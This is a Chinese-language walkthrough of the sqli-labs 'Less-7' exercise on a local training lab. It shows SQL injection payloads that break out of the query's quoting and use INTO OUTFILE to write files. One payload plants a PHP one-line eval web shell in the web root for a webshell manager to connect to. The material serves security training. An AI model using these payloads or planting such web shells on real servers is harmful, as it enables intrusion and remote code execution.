Less-7
本关的标题是dump into outfile,意思是本关我们利用文件导入的方式进行注入。而在background-3中我们已经学习了如何利用dump into file.
这里首先还是回到源代码中去。重点放在对id参数的处理和sql语句上,从源代码中可以看到$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
这里对id参数进行了 '))的处理。所以我们其实可以尝试')) or 1=1--+进行注入
http://127.0.0.1/sqllib/Less-7/?id=1')) or 1=1--+
那我们这里利用上述提到的文件导入的方式进行演示:
http://127.0.0.1/sqllib/Less-7/?id=1'))UNION SELECT 1,2,3 into outfile "c:\wamp\www\sqllib\Less-7\uuu.txt"%23
上图中显示sql出错了,但是没有关系,我们可以在文件中看到uuu.txt已经生成了。
像上述background-3中一样,我们可以直接将一句话木马导入进去。
http://127.0.0.1/sqllib/Less-7/?id=1'))UNION SELECT 1,2,'<?php @eval($_post["mima"])?>' into outfile "c:\wamp\www\sqllib\Less-7\yijuhua.php"--+
我们可以在文件中看到一句话木马已经导入进去了
页面访问
此时用菜刀等webshell管理工具连接即可,这里不演示此过程了。
这里还有其他的内容可以导入,可以自己思考进行尝试。同时导入的方法上述在background中已经讲解过了,可以自行尝试。